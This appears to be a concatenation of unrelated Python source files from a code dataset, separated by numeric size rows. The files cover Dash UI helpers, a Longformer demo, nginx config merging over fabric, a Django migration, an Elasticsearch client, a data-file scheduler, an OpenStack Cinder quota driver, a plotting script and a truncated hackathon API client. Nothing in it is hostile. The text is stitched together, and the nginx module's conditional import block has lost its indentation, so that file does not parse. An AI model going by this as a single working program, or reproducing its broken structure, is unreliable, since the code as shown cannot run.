# * 20 points (คะแนน) : N <= 20, M <= 100
# * 30 points (คะแนน) : N <= 69, M <= 420
# * 50 points (คะแนน) : no additional constraints (ไม่มีเงื่อนไขเพิ่มเติม)
def useGenerator(gen):
    """Feed every test-case specification to the generator callback `gen`.

    Each tuple is (case id, seed/name, N, M, max_p, max_a).
    """
    cases = [
        ("s1", "sample1", 5, 10, 10, 10),
        ("s2", "sample2", 7, 10, 9, 9),
        (1, "112 ติดบั๊ก", 10, 15, 10, 10),
        (2, 69, 20, 100, 10**4, 10**4),
        (3, 420, 20, 100, 10**6, 10**6),
        (4, 69420, 69, 420, 10**6, 10**6),
        (5, 177013, 69, 420, 10**6, 10**6),
        (6, "germany", 500, 10000, 10**6, 10**6),
        (7, "jail", 500, 10000, 10**6, 10**6),
        (8, "bruh wtf", 500, 10000, 10**6, 10**6),
        (9, "meta", 500, 10000, 10**6, 10**6),
        (10, 101336844, 500, 10000, 10**6, 10**6),
        # (11, 69, 1000, 100000, 10**6, 10**6),
        # (12, 69, 2021, 100000, 10**4, 10**4),
    ]
    for case in cases:
        gen(*case)
| 835 | 639 |
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
def get_options_from_list(list_):
    """Build Dash dropdown options where each label equals its value."""
    return [{"value": item, "label": item} for item in list_]
def get_options_from_dict(dict_):
    """Build Dash dropdown options from a {value: label} mapping."""
    return [{"value": key, "label": label} for key, label in dict_.items()]
def get_item_radio_items(id, items, legend, from_dict=True, value_idx=0):
    """Build a labelled Dash RadioItems group.

    Args:
        id: component id for the RadioItems.
        items: dict (value -> label) when from_dict, else a plain list of values.
        legend: text shown above the control.
        from_dict: whether `items` is a dict or a list.
        value_idx: index of the option preselected by default.
    """
    if from_dict:
        options = get_options_from_dict(items)
    else:
        options = get_options_from_list(items)
    return dbc.FormGroup(
        [
            html.P(legend),
            dcc.RadioItems(
                id=id,
                options=options,
                value=options[value_idx]["value"],
                labelStyle={"display": "inline-block", "margin": "5px"},
            ),
        ]
    )
def get_drop_down(id, items, legend, from_dict=True, value=None, multi=False, clearable=False):
    """Build a labelled Dash Dropdown.

    Args:
        id: component id.
        items: dict (value -> label) when from_dict, else a plain list of values.
        legend: text shown above the control.
        from_dict: whether `items` is a dict or a list.
        value: preselected value(s); defaults to the first option.
        multi: allow multiple selections; a scalar value is wrapped in a list.
        clearable: whether the selection can be cleared.
    """
    if from_dict:
        options = get_options_from_dict(items)
    else:
        options = get_options_from_list(items)
    if value is None:
        value = options[0]["value"]
    # Fix: use isinstance instead of `type(value) != list` so list
    # subclasses are also accepted.
    if multi and not isinstance(value, list):
        value = [value]
    return dbc.FormGroup(
        [
            html.P(legend),
            dcc.Dropdown(
                id=id,
                options=options,
                value=value,
                clearable=clearable,
                multi=multi,
                placeholder="Nothing is selected.",
            ),
        ]
    )
def get_check_list(id, items, legend, from_dict=True, value=None):
    """Build a labelled Dash Checklist.

    Args:
        id: component id.
        items: dict (value -> label) when from_dict, else a plain list of values.
        legend: text shown above the control.
        from_dict: whether `items` is a dict or a list.
        value: single preselected value; defaults to the first option.
            NOTE(review): unlike get_drop_down, `value` is always wrapped in
            [value] -- passing a list produces a nested list; confirm intended.
    """
    if from_dict:
        options = get_options_from_dict(items)
    else:
        options = get_options_from_list(items)
    if value is None:
        value = options[0]["value"]
    return dbc.FormGroup(
        [
            html.P(legend),
            dcc.Checklist(id=id, options=options, value=[value], labelStyle={"display": "inline-block"}),
        ]
    )
def get_range_slider(id, min, max, legend):
    """Build a labelled Dash RangeSlider spanning [min, max] with marks
    every 5 units; snapping is restricted to the marks (step=None)."""
    marks = {tick: str(tick) for tick in range(min, max + 1, 5)}
    return dbc.FormGroup(
        [
            html.P(legend),
            dcc.RangeSlider(
                id=id,
                min=min,
                max=max,
                value=[min, max],
                marks=marks,
                step=None,
            ),
            html.Br(),
        ]
    )
| 2,532 | 779 |
# from transformers import ReformerModel, ReformerTokenizer
# import torch
#
# tokenizer = ReformerTokenizer.from_pretrained('google/reformer-crime-and-punishment')
# model = ReformerModel.from_pretrained('google/reformer-crime-and-punishment')
#
# input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1
# print(input_ids.shape)
# outputs = model(input_ids)
#
# pooled_output = torch.mean(outputs[0], dim=1)
#
# last_hidden_states = outputs[0]
import torch
from longformer.longformer import Longformer, LongformerConfig
from longformer.sliding_chunks import pad_to_window_size
from transformers import RobertaTokenizer
# Demo: encode one long document with Longformer's windowed self-attention.
config = LongformerConfig.from_pretrained('longformer-base-4096/')
# choose the attention mode 'n2', 'tvm' or 'sliding_chunks'
# 'n2': for regular n2 attantion
# 'tvm': a custom CUDA kernel implementation of our sliding window attention
# 'sliding_chunks': a PyTorch implementation of our sliding window attention
config.attention_mode = 'sliding_chunks'
model = Longformer.from_pretrained('longformer-base-4096/', config=config)
tokenizer = RobertaTokenizer.from_pretrained('roberta-base')
# Let the tokenizer accept sequences as long as the model's position embeddings.
tokenizer.model_max_length = model.config.max_position_embeddings
SAMPLE_TEXT = ' '.join(['Hello world! '] * 1000)  # long input document
SAMPLE_TEXT = f'{tokenizer.cls_token}{SAMPLE_TEXT}{tokenizer.eos_token}'
input_ids = torch.tensor(tokenizer.encode(SAMPLE_TEXT)).unsqueeze(0)  # batch of size 1
# TVM code doesn't work on CPU. Uncomment this if `config.attention_mode = 'tvm'`
# model = model.cuda(); input_ids = input_ids.cuda()
# Attention mask values -- 0: no attention, 1: local attention, 2: global attention
attention_mask = torch.ones(input_ids.shape, dtype=torch.long, device=input_ids.device)  # initialize to local attention
attention_mask[:, [1, 4, 21,]] = 2  # Set global attention based on the task. For example,
                                    # classification: the <s> token
                                    # QA: question tokens
# padding seqlen to the nearest multiple of 512. Needed for the 'sliding_chunks' attention
input_ids, attention_mask = pad_to_window_size(
    input_ids, attention_mask, config.attention_window[0], tokenizer.pad_token_id)
output = model(input_ids, attention_mask=attention_mask)[0]
| 2,333 | 777 |
from operator import itemgetter
from platform import python_version_tuple
from sys import version
if version[0] == "2":
from cStringIO import StringIO
else:
from functools import reduce
from io import StringIO
from copy import copy
from itertools import filterfalse
from os import remove, path
from string import Template
from tempfile import mkstemp
from fabric.contrib.files import exists
from fabric.operations import get, put
from nginxparser import loads, dumps, load
class DollarTemplate(Template):
    """string.Template variant: '$' delimiter (same as the stdlib default)
    with identifiers restricted to a lowercase letter followed by
    [_a-z0-9]* -- i.e. no leading underscore, unlike the stdlib pattern."""
    delimiter = "$"
    idpattern = r"[a-z][_a-z0-9]*"
def ensure_semicolon(s):  # type: (str) -> str or None
    """Right-strip `s` and guarantee it ends with ';' (None passes through,
    and the empty string is returned as-is)."""
    if s is None:
        return None
    trimmed = s.rstrip()
    if not trimmed or trimmed.endswith(";"):
        return trimmed
    return "{};".format(trimmed)
def _copy_or_marshal(block): # type: (str or list) -> list
return copy(block) if isinstance(block, list) else loads(block)
def merge_into(
    server_name, parent_block, *child_blocks
):  # type: (str, str or list, *list) -> list
    """Merge `child_blocks` into the server block of `parent_block` whose
    server_name matches `server_name`, de-duplicating directives by name
    (the later occurrence wins). Returns the (copied) parent block."""
    parent_block = _copy_or_marshal(parent_block)
    server_name_idx = -1
    indicies = set()  # (sic) statement indices where server_name matched
    break_ = False
    # Scan for the matching server block; an SSL listen ("443...") seen
    # together with a prior match short-circuits the scan.
    for i, tier in enumerate(parent_block):
        for j, statement in enumerate(tier):
            for k, stm in enumerate(statement):
                if statement[k][0] == "server_name" and statement[k][1] == server_name:
                    server_name_idx = i
                    indicies.add(k)
                    if break_:
                        break
                elif statement[k][0] == "listen" and statement[k][1].startswith("443"):
                    break_ = True
                    if k in indicies:
                        break
    server_name_idx += 1
    if not len(indicies):
        # No matching server_name: return the parent untouched.
        return parent_block
    # Clamp the insertion index into the last tier.
    length = len(parent_block[-1])
    if server_name_idx >= length:
        server_name_idx = length - 1
    parent_block[-1][server_name_idx] += list(
        map(
            lambda child_block: child_block[0]
            if isinstance(child_block[0], list)
            else loads(child_block)[0],
            child_blocks,
        )
    )
    # De-duplicate by directive name, keeping the last occurrence.
    # NOTE(review): reads parent_block[-1][-1] but assigns to
    # parent_block[-1][server_name_idx] -- confirm these are meant to differ.
    parent_block[-1][server_name_idx] = list(
        reversed(uniq(reversed(parent_block[-1][-1]), itemgetter(0)))
    )
    return parent_block
def merge_into_str(
    server_name, parent_block, *child_blocks
):  # type: (str, str or list, *list) -> str
    """Merge `child_blocks` into `parent_block` (see merge_into) and
    serialise the result back to nginx config text."""
    merged = merge_into(server_name, parent_block, *child_blocks)
    return dumps(merged)
def upsert_by_location(
    server_name, location, parent_block, child_block
):  # type: (str, str, str or list, str or list) -> list
    """Replace (or insert) the block for `location` inside the server block
    matching `server_name`: any existing entry for that location is removed
    first, then `child_block` is merged in."""
    return merge_into(
        server_name,
        remove_by_location(_copy_or_marshal(parent_block), location),
        child_block,
    )
def remove_by_location(parent_block, location):  # type: (list, str) -> list
    """Return a rebuilt copy of `parent_block` with every entry whose first
    directive's argument equals `location` filtered out."""
    if isinstance(parent_block, list):
        parent_block = copy(parent_block)
    else:
        parent_block = loads(parent_block)

    def _keeps(entry):
        # Drop entries shaped like [["location", <loc>], ...] for this location.
        return not (len(entry) and len(entry[0]) > 1 and entry[0][1] == location)

    return [
        [[entry for entry in subblock if _keeps(entry)] for subblock in block]
        for block in parent_block
    ]
def _prevent_slash(s): # type: (str) -> str
return s[1:] if s.startswith("/") else s
def apply_attributes(
    block, attribute, append=False
):  # type: (str or list, str or list, bool) -> list
    """Insert `attribute` statements into `block` (both accepted as raw
    strings or parsed lists). With append=True they are appended to the last
    sub-block; otherwise they are spliced in front of the first nested
    block found, falling back to appending. Consecutive duplicate
    'server_name'/'listen' directives are then collapsed (last one kept)."""
    block = _copy_or_marshal(block)
    attribute = _copy_or_marshal(attribute)
    if append:
        block[-1][-1] += attribute
    else:
        changed = False
        for bid, _block in enumerate(block[-1]):
            for sid, subblock in enumerate(_block):
                if isinstance(subblock[0], list):
                    # Nested block: splice the attributes just before it.
                    block[-1][bid] = attribute + [block[-1][bid][sid]]
                    changed = True
                    break
        if not changed:
            block[-1][-1] += attribute
    # TODO: Generalise these lines to a `remove_duplicates` or `remove_consecutive_duplicates` function
    prev_key = None
    subseq_removed = []
    if not isinstance(block[0][1], list):
        return block
    # Walk in reverse so the LAST occurrence of a duplicated directive wins.
    block[0][1].reverse()
    for subblock in block[0][1]:
        if (
            prev_key is not None
            and prev_key == subblock[0]
            and prev_key in ("server_name", "listen")
        ):
            continue
        subseq_removed.append(subblock)
        prev_key = subblock[0]
    subseq_removed.reverse()
    block[0][1] = subseq_removed
    return block
def upsert_upload(new_conf, name="default", use_sudo=True):
    """Download a remote nginx site config, transform it with `new_conf`,
    and upload the result back to the same path.

    Args:
        new_conf: callable taking the parsed config, returning the new one.
        name: site name under /etc/nginx/sites-enabled/.
        use_sudo: passed through to fabric's get()/put().
    """
    from os import close  # local import: module top only imports os.remove/os.path

    conf_name = "/etc/nginx/sites-enabled/{nginx_conf}".format(nginx_conf=name)
    if not conf_name.endswith(".conf") and not exists(conf_name):
        conf_name += ".conf"
    # cStringIO.StringIO, StringIO.StringIO, TemporaryFile, SpooledTemporaryFile all failed :(
    fd, local_tmp = mkstemp(name)
    close(fd)  # bug fix: mkstemp returns an OPEN os-level fd; it used to leak
    get(remote_path=conf_name, local_path=local_tmp, use_sudo=use_sudo)
    with open(local_tmp, "rt") as f:
        conf = load(f)
    new_conf = new_conf(conf)
    remove(local_tmp)
    sio = StringIO()
    sio.write(dumps(new_conf))
    # NOTE(review): sio is positioned at EOF here; confirm fabric's put()
    # rewinds file-like objects before reading.
    return put(sio, conf_name, use_sudo=use_sudo)
def get_parsed_remote_conf(
    conf_name, suffix="nginx", use_sudo=True
):  # type: (str, str, bool) -> [str]
    """Download a remote nginx config file and return it parsed.

    Args:
        conf_name: remote path (".conf" is appended when missing and the
            bare path does not exist remotely).
        suffix: suffix for the local temporary file name.
        use_sudo: passed through to fabric's get().
    """
    from os import close  # local import: module top only imports os.remove/os.path

    if not conf_name.endswith(".conf") and not exists(conf_name):
        conf_name += ".conf"
    # cStringIO.StringIO, StringIO.StringIO, TemporaryFile, SpooledTemporaryFile all failed :(
    fd, local_tmp = mkstemp(suffix)
    close(fd)  # bug fix: mkstemp returns an OPEN os-level fd; it used to leak
    get(remote_path=conf_name, local_path=local_tmp, use_sudo=use_sudo)
    with open(local_tmp, "rt") as f:
        conf = load(f)
    remove(local_tmp)
    return conf
def ensure_nginxparser_instance(conf_file):  # type: (str) -> [[[str]]]
    """Coerce `conf_file` -- an already-parsed list, a file-like object,
    a filesystem path, or a raw config string -- into nginxparser's
    nested-list representation."""
    if isinstance(conf_file, list):
        return conf_file
    elif hasattr(conf_file, "read"):
        return load(conf_file)
    elif path.isfile(conf_file):
        with open(conf_file, "rt") as f:
            return load(f)
    else:
        # Fall back to treating the argument as raw config text.
        return loads(conf_file)
def uniq(iterable, key=lambda x: x):
    """
    Remove duplicates from an iterable. Preserves order (first occurrence
    of each key is kept). Returns [] for an empty iterable.
    :type iterable: Iterable[Ord => A]
    :param iterable: an iterable of objects of any orderable type
    :type key: Callable[A] -> (Ord => B)
    :param key: optional argument; by default an item (A) is discarded
    if another item (B), such that A == B, has already been encountered and taken.
    If you provide a key, this condition changes to key(A) == key(B); the callable
    must return orderable objects.
    """
    # Enumerate the list to restore order lately; reduce the sorted list; restore order
    srt_enum = sorted(enumerate(iterable), key=lambda item: key(item[1]))
    if not srt_enum:
        # Bug fix: reduce() below seeds with srt_enum[0], which raised
        # IndexError for an empty iterable.
        return []

    def append_unique(acc, item):
        # Keep `item` unless it duplicates (by key) the previously kept one.
        return acc if key(acc[-1][1]) == key(item[1]) else acc.append(item) or acc

    deduped = reduce(append_unique, srt_enum, [srt_enum[0]])
    # Re-sort by the original enumeration index to restore input order.
    return [item[1] for item in sorted(deduped)]
| 7,091 | 2,231 |
from setuptools import setup
from setuptools.command.install import install as _install
class install(_install):
    """Custom setuptools install command; currently just delegates to the
    stock install (kept as a hook point for post-install steps)."""
    def run(self):
        _install.run(self)
# Packaging metadata for the hydra HDR image processing library.
setup(
    cmdclass = { 'install' : install },  # route `install` through the subclass above
    name = 'hydra',
    version = '0.1',
    author = 'tatsy',
    author_email = 'tatsy.mail@gmail.com',
    url = 'https://github.com/tatsy/hydra.git',
    description = 'Python HDR image processing library.',
    license = 'MIT',
    classifiers = [
        'Development Status :: 1 - Planning',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4'
    ],
    packages = [
        'hydra',
        'hydra.core',
        'hydra.eo',
        'hydra.filters',
        'hydra.gen',
        'hydra.io',
        'hydra.tonemap'
    ]
)
| 832 | 282 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-05-06 08:15
from __future__ import unicode_literals
from django.db import migrations
from ..compat import JSONField
class Migration(migrations.Migration):
    """Adds EmailTemplate.test_context: a JSON blob of dummy data used for
    test-rendering templates (auto-populated on first save)."""

    dependencies = [("appmail", "0002_add_template_description")]

    operations = [
        migrations.AddField(
            model_name="emailtemplate",
            name="test_context",
            field=JSONField(
                default=dict,
                blank=True,
                help_text=(
                    "Dummy JSON used for test rendering (set automatically on first "
                    "save)."
                ),
            ),
        )
    ]
| 689 | 200 |
"""Client that handles query to elasticsearch"""
import string
from typing import List
from elasticsearch_dsl import Search
from alexafsm.test_helpers import recordable as rec
from elasticsearch_dsl.response import Response
from tests.skillsearch.skill_settings import SkillSettings
from tests.skillsearch.skill import Skill, INDEX
from tests.skillsearch.dynamodb import DynamoDB
# Shared search template over the skill index; the 'html' field is excluded
# from returned hits.
es_search: Search = Search(index=INDEX).source(excludes=['html'])


def get_es_skills(query: str, top_n: int, category: str = None, keyphrase: str = None) -> (int, List[Skill]):
    """Return the total number of hits and the top_n skills"""
    result = get_es_results(query, category, keyphrase).to_dict()
    return result['hits']['total'], [Skill.from_es(h) for h in result['hits']['hits'][:top_n]]
def recordable(func):
    """Decorate `func` with alexafsm's record/playback helper.

    The three accessors are passed as callables so record/playback flags are
    read from SkillSettings at call time, not at decoration time.
    """
    def _get_record_dir():
        return SkillSettings().get_record_dir()

    def _is_playback():
        return SkillSettings().playback

    def _is_record():
        return SkillSettings().record

    return rec(_get_record_dir, _is_playback, _is_record)(func)
@recordable
def get_es_results(query: str, category: str, keyphrase: str) -> Response:
    """Search skills strictly (AND matching) first; if nothing is found,
    retry with relaxed (OR) matching."""
    results = _get_es_results(query, category, keyphrase, strict=True)
    if len(results.hits) == 0:
        # relax constraints a little
        return _get_es_results(query, category, keyphrase, strict=False)
    else:
        return results
def _get_es_results(query: str, category: str, keyphrase: str, strict: bool) -> Response:
    """Execute the elasticsearch query; `strict` toggles AND vs OR matching
    on the multi-field text query."""
    skill_search = es_search
    if category:
        # Normalize user-supplied category to the index's title-cased form,
        # e.g. "movies and tv" -> "Movies & TV".
        skill_search = skill_search.query('match',
                                          category=string.capwords(category)
                                          .replace(' And ', ' & ')
                                          .replace('Movies & Tv', 'Movies & TV'))
    if keyphrase:
        skill_search = skill_search.query('match', keyphrases=keyphrase)
    if query:
        operator = 'and' if strict else 'or'
        # Highlight matches with '*' so the skill can speak/emphasize them.
        skill_search = skill_search.query('multi_match',
                                          query=query,
                                          fields=['name', 'description', 'usages', 'keyphrases'],
                                          minimum_should_match='50%',
                                          operator=operator) \
            .highlight('description', order='score', pre_tags=['*'], post_tags=['*']) \
            .highlight('title', order='score', pre_tags=['*'], post_tags=['*']) \
            .highlight('usages', order='score', pre_tags=['*'], post_tags=['*'])
    return skill_search.execute()
@recordable
def get_user_info(user_id: str, request_id: str) -> dict:  # NOQA
    """Get information of user with user_id from dynamodb. request_id is simply there so that we can
    record different responses from dynamodb for the same user during playback"""
    return DynamoDB().get_user_info(user_id)
@recordable
def register_new_user(user_id: str):
    """Create a DynamoDB record for a first-time user."""
    DynamoDB().register_new_user(user_id)
| 3,006 | 885 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Includes the Schedule class, validation functions, and compilation functions
for compiling a schedule of files to process.
Methods:
compile: shortcut for validating the loaded configuration, then
running the search and _resolve steps
load: load the schedule.yaml file into a dictionary
get_file_paths: return a dictionary of files for a given subject, task, and
data source.
search: search the data_path for all files matching the patterns.
validate_schema: validate yaml contents against the schedule configuration
schema.
validate_data_source_names: validates that the data source names contained
in the configuration match a given list of possible data source names
validate_patterns: validates that the regex patterns return named fields
matching a list of required named fields
Configuration schema (YAML):
{task_name (str):
{data_source_name (str):
{filetype (str): pattern (str)}
}
}
"""
from schema import Schema
import os
import re
import pandas as pd
import numpy as np
import functools
def memoize(obj):
    """Cache *obj*'s results keyed on ``str(args) + str(kwargs)``.

    The cache dict is attached to the wrapped callable as ``.cache`` (and is
    reachable on the wrapper too, since functools.wraps copies __dict__).
    Arguments must therefore have stable string representations.
    """
    cache = obj.cache = {}

    @functools.wraps(obj)
    def memoizer(*args, **kwargs):
        key = str(args) + str(kwargs)
        if key not in cache:
            cache[key] = obj(*args, **kwargs)
        return cache[key]
    return memoizer


# TODO(janmtl): Schedule should extend pd.DataFrame
class Schedule(object):
    """
    An object for scheduling files to be processed by data sources.

    Args:
        raw (dict): schedule configuration shaped
            {task_name: {data_source_name: {filetype: regex pattern}}}.

    Attributes:
        raw (dict): the validated configuration dictionary.
        sched_df (pandas.DataFrame): one row per discovered file
            (None until compile() has run).
        subjects (list): subject ids present in sched_df.
    """

    def __init__(self, raw):
        self.raw = self.validate_schema(raw)
        self.sched_df = None
        self.subjects = []
        self.valid_subjects = []
        self.invalid_subjects = []

    @memoize
    def get_subschedule(self, task_name, data_source_name):
        """Fetches the schedule for a given task and data source."""
        return self.raw[task_name][data_source_name]

    def compile(self, data_paths):
        """Search the data path for the files to add to the schedule."""
        # TODO(janmtl): this should accept globs
        # TODO(janmtl): should be able to pass a list of excluded subjects
        if not isinstance(data_paths, list):
            # Bug fix: wrap a single path in a list. The previous
            # list(data_paths) split a string path into its characters.
            data_paths = [data_paths]
        files_df = self.search(self.raw, data_paths)
        self.sched_df = self._resolve(files_df)
        self.sched_df[['Subject', 'Task_Order']] = \
            self.sched_df[['Subject', 'Task_Order']].astype(np.int64)
        self.subjects = list(np.unique(self.sched_df['Subject']))

    # TODO(janmtl): The function that checks the integrity of a subject's data
    # should also return which subjects are broken and why
    def validate_files(self):
        """Iterate over subjects and make sure that they all have all the files
        they need. Returns a boolean pivot table (True where exactly one file
        was found per (subject, data source, task, file type))."""
        cf = (self.sched_df.pivot_table(index='Subject',
                                        columns=['Data_Source_Name',
                                                 'Task_Name',
                                                 'File'],
                                        values='Path',
                                        aggfunc=lambda x: len(x)) == 1)
        return cf

    def remove_subject(self, subject_id):
        """Drop one subject from the schedule (no-op if absent)."""
        self.sched_df = self.sched_df[self.sched_df['Subject'] != subject_id]
        if subject_id in self.subjects:
            self.subjects.remove(subject_id)

    def isolate_subjects(self, subject_ids):
        """Keep only the given subjects."""
        self.sched_df = self.sched_df[self.sched_df['Subject']
                                      .isin(subject_ids)]
        self.subjects = subject_ids

    def isolate_tasks(self, task_names):
        """Keep only the given tasks."""
        self.sched_df = self.sched_df[self.sched_df['Task_Name']
                                      .isin(task_names)]

    def isolate_data_sources(self, data_source_names):
        """Keep only the given data sources."""
        self.sched_df = self.sched_df[self.sched_df['Data_Source_Name']
                                      .isin(data_source_names)]

    def get_file_paths(self, subject_id, task_name, data_source_name):
        """Return a dictionary {file type: path} of all files for a given
        subject, task, and data source.

        Raises:
            Exception: if the schedule is empty or the triple is not found.
        """
        if self.sched_df.empty:
            raise Exception('Schedule is empty, try Schedule.compile(path).')
        sub_df = self.sched_df[
            (self.sched_df['Subject'] == subject_id)
            & (self.sched_df['Task_Name'] == task_name)
            & (self.sched_df['Data_Source_Name'] == data_source_name)
        ]
        if sub_df.empty:
            raise Exception(
                '({}, {}, {}) not found in schedule.'.format(subject_id,
                                                             task_name,
                                                             data_source_name)
            )
        list_of_files = sub_df[['File', 'Path']].to_dict('records')
        files_dict = {ds['File']: ds['Path'] for ds in list_of_files}
        return files_dict

    @staticmethod
    def search(raw, data_paths):
        """Search the data paths for matching file patterns and return a pandas
        DataFrame of the results (one row per matched file)."""
        files_dict = []
        # Py3 compat fix: dict.iteritems() does not exist on Python 3;
        # .items() behaves identically (and also works on Python 2).
        for task_name, task in raw.items():
            for data_source_name, patterns in task.items():
                for pattern_name, pattern in patterns.items():
                    for data_path in data_paths:
                        for root, _, files in os.walk(data_path):
                            for filepath in files:
                                file_match = re.match(pattern, filepath)
                                if file_match:
                                    # Named regex groups (Subject, Task_Order)
                                    # become columns alongside the metadata.
                                    fd = file_match.groupdict()
                                    fd['Task_Name'] = task_name
                                    fd['Data_Source_Name'] = data_source_name
                                    fd['File'] = pattern_name
                                    fd['Path'] = os.path.join(root, filepath)
                                    files_dict.append(fd)
        files_df = pd.DataFrame(files_dict)
        # Patterns without a Task_Order group default to order 0.
        files_df.fillna({'Task_Order': 0}, inplace=True)
        files_df[['Subject', 'Task_Order']] = \
            files_df[['Subject', 'Task_Order']].astype(np.int64)
        return files_df

    @staticmethod
    def _resolve(files_df):
        """
        Resolve any files that matched multiple Task_Order values and
        return a subset of the Data Frame.

        Args:
            files_df (pandas.DataFrame): a DataFrame resulting from
                Schedule.search().
        """
        # Keep only (Subject, Data_Source_Name, File, Task_Name) groups that
        # matched exactly one Task_Order; use those to pin down each
        # subject/task's order, then re-join against the full file list.
        counter = files_df.groupby(['Subject',
                                    'Data_Source_Name',
                                    'File',
                                    'Task_Name'])['Task_Order'].count()
        maps = counter[counter == 1]
        maps = maps.reset_index()
        maps.drop('Task_Order', axis=1, inplace=True)
        orders = pd.merge(maps, files_df)[['Subject',
                                           'Task_Name',
                                           'Task_Order']]
        orders.drop_duplicates(inplace=True)
        sched_df = pd.merge(orders, files_df)[['Subject',
                                               'Task_Name',
                                               'Task_Order',
                                               'File',
                                               'Data_Source_Name',
                                               'Path']]
        return sched_df

    @staticmethod
    def validate_schema(raw):
        """Validate the schedule dictionary against the schema described
        above (str -> str -> str -> str)."""
        schema = Schema({str: {str: {str: str}}})
        return schema.validate(raw)

    @staticmethod
    def validate_data_source_names(raw, data_source_names):
        """
        Validate that all data source names are contained in the
        data_source_names list.

        Args:
            data_source_names (list(str)): list of valid data source names
                implemented in pypsych.
        """
        for _, task in raw.items():
            for data_source_name in task.keys():
                if data_source_name not in data_source_names:
                    raise Exception(
                        'Schedule could not validate data source ',
                        data_source_name
                    )

    @staticmethod
    def validate_patterns(raw):
        """Validate that file pattern regexes use only the Task_Order and
        Subject named groups."""
        for _, task in raw.items():
            for _, data_source in task.items():
                for _, pattern in data_source.items():
                    compiled_pattern = re.compile(pattern)
                    for group_name in compiled_pattern.groupindex.keys():
                        if group_name not in ['Task_Order', 'Subject']:
                            raise Exception(
                                'Schedule could not validate pattern ',
                                pattern
                            )
| 9,380 | 2,465 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import defaultdict
from oslo_log import log
from cinderclient import client
from dcorch.common import exceptions
from dcorch.drivers import base
LOG = log.getLogger(__name__)
API_VERSION = '2'
class CinderClient(base.DriverBase):
    '''Cinder V2 driver.

    Thin wrapper around cinderclient for reading and writing per-project
    volume quotas in one region.
    '''

    def __init__(self, region, disabled_quotas, session, endpoint_type):
        """
        :param region: region the client talks to.
        :param disabled_quotas: iterable of quota names to skip; when it
            contains 'volumes', volume quota operations become no-ops.
        :param session: authentication session for the client.
        :param endpoint_type: catalog endpoint type.
        """
        self.cinder = client.Client(API_VERSION,
                                    session=session,
                                    region_name=region,
                                    endpoint_type=endpoint_type)
        # Idiom fix: 'in' already yields a bool, the ternary was redundant.
        # (The previous try/except that only re-raised ServiceUnavailable
        # was a no-op and has been removed; the exception still propagates.)
        self.no_volumes = 'volumes' in disabled_quotas

    def get_resource_usages(self, project_id):
        """Calculate resources usage and return the dict

        :param: project_id
        :return: dict mapping resource name -> in_use + reserved, or None
            when volume quotas are disabled.

        TODO: support the rest of the quotas
        """
        if self.no_volumes:
            return None
        quota_usage = self.cinder.quotas.get(
            project_id, usage=True)
        quota_usage_dict = quota_usage.to_dict()
        # 'id' is the project id, not a quota entry.
        del quota_usage_dict['id']
        resource_usage = defaultdict(dict)
        for resource in quota_usage_dict:
            # NOTE: May be able to remove "reserved" if
            # cinder will never set it. Need to check.
            resource_usage[resource] = (
                quota_usage_dict[resource]['in_use'] +
                quota_usage_dict[resource]['reserved'])
        return resource_usage

    def get_quota_limits(self, project_id):
        """Get the resource limits as a dict (quota name -> limit)."""
        quotas = self.cinder.quotas.get(
            project_id, usage=False)
        quotas_dict = quotas.to_dict()
        del quotas_dict['id']
        return quotas_dict

    def update_quota_limits(self, project_id, **new_quota):
        """Update the limits; no-op (returns None) when volumes are disabled."""
        if not self.no_volumes:
            return self.cinder.quotas.update(project_id, **new_quota)

    def delete_quota_limits(self, project_id):
        """Delete/Reset the limits; no-op when volumes are disabled."""
        if not self.no_volumes:
            return self.cinder.quotas.delete(project_id)
| 3,160 | 840 |
import numpy as np
from matplotlib import pyplot as plt
import figlatex
import template
import afterpulse_tile21
# Band style per overvoltage (V): solid red, hatched, and plain outline.
styles = {
    5.5: dict(color='#f55'),
    7.5: dict(hatch='//////', facecolor='#0000'),
    9.5: dict(edgecolor='black', facecolor='#0000'),
}

fig, ax = plt.subplots(num='figshape', clear=True, figsize=[7, 3.3])

for vov, style in styles.items():
    ap21 = afterpulse_tile21.AfterPulseTile21(vov)
    templates = []
    # One generated template waveform per file for this overvoltage.
    for files in ap21.filelist:
        file = files['templfile']
        templ = template.Template.load(file)
        # aligned, fixed-amplitude waveform at 1 sample timebase
        kw = dict(timebase=1, aligned=True, randampl=False)
        y, = templ.generate(templ.template_length, [0], **kw)
        templates.append(y)
    # Mean +/- sample std across files, normalised by the template minimum
    # (np.min(m) — presumably the negative pulse peak; TODO confirm sign).
    m = np.mean(templates, axis=0)
    s = np.std(templates, axis=0, ddof=1)
    norm = np.min(m)
    ax.fill_between(np.arange(len(m)), (m - s) / norm, (m + s) / norm, label=f'{vov} V', zorder=2, **style)

ax.minorticks_on()
ax.grid(True, 'major', linestyle='--')
ax.grid(True, 'minor', linestyle=':')
ax.legend(title='Overvoltage')
ax.set_xlabel('Sample number after trigger @ 1 GSa/s')
ax.set_xlim(0, 1000)

fig.tight_layout()
fig.show()
figlatex.save(fig)
| 1,202 | 483 |
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 13 11:08:56 2021
@author: yasse
"""
# =============================================================================
# Imports
# =============================================================================
import requests
from . import ipaddr as u
from .public import getTickers
# =============================================================================
# Initialize
# =============================================================================
def init(group_token):
    """
    Initializing the connection and authenticating the token.

    Stores the token and ticker list on the shared module `u`, then checks
    the token against the auth endpoint.

    :param group_token: API token string handed out for the hackathon.
    :raises ValueError: if group_token is not a string.
    :raises NameError: if the server rejects the token (non-200 response).
    """
    # isinstance is the idiomatic type check (replaces type(x) == str).
    if not isinstance(group_token, str):
        raise ValueError("""
        You have entered a wrong value. Make sure that the token is in the
        form of a string like :
        '171beb3a-b3bc-4j76-9s89-39332218106e' """)

    u.token = group_token
    u.tickers = u.tickers + getTickers()

    url = u.url
    auth_url = url + '/auth/login'
    body = {"token": u.token}
